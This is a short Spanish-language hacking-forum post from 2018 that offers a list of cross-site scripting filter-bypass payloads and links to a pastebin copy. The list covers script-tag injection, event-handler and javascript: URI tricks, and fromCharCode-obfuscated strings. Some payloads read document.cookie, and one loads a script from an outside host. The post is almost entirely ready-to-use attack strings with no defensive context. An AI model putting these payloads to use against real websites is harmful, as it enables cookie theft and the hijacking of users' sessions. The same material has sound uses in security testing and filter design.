Payloads XSS Filter Bypass List

  • 0 Respuestas
  • 4195 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Country: tr
  • Reputación 1
  • Twitter: @drok3r
    • Ver Perfil
    • RedBird
    • Email

Payloads XSS Filter Bypass List

  • en: Febrero 22, 2018, 11:13:16 am
Payloads XSS Filter Bypass List



Código: (text) [Seleccionar]
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">

Link PasteBin
https://pastebin.com/raw/zXWBZnDP
« Última modificación: Febrero 22, 2018, 11:30:00 am por Drok3r »